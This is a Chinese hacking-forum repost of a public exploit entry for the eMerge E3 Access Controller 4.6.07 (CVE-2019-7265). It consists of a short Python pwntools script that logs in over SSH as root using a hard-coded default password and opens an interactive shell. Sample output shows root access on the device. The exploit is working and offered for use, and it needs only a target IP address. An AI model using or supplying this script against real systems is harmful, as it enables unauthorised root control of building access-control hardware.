eMerge E3 Access Controller 4.6.07 - Remote Code Execution - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月4日3年前

# Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 4.6.07
# Tested on: NA
# CVE : CVE-2019-7265
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005

#!/usr/bin/env python
#
# ====
# python lineare3_sshroot.py 192.168.1.2
# [+] Connecting to 192.168.1.2 on port 22: Done
# [!] Only Linux is supported for ASLR checks.
# [*] [email protected]:
#     Distro    Unknown Unknown
#     OS:       Unknown
#     Arch:     Unknown
#     Version:  0.0.0
#     ASLR:     Disabled
#     Note:     Susceptible to ASLR ulimit trick (CVE-2016-3672)
# [+] Opening new channel: 'shell': Done
# [*] Switching to interactive mode
# Last login: Fri Nov  1 04:21:44 2019 from 192.168.2.17
# root@imx6slevk:~# id
# uid=0(root) gid=0(root) groups=0(root)
# root@imx6slevk:~# pwd
# /home/root
# root@imx6slevk:~# exit
# logout
# [*] Got EOF while reading in interactive
# [*] Closed SSH channel with 192.168.1.2
# ====

from pwn import *

if len(sys.argv) < 2:
    print 'Usage: ./e3.py <ip>\n'
    sys.exit()

ip = sys.argv[1]
rshell = ssh('root', ip, password='davestyle', port=22)
rshell.interactive()

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

eMerge E3 Access Controller 4.6.07 - Remote Code Execution

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索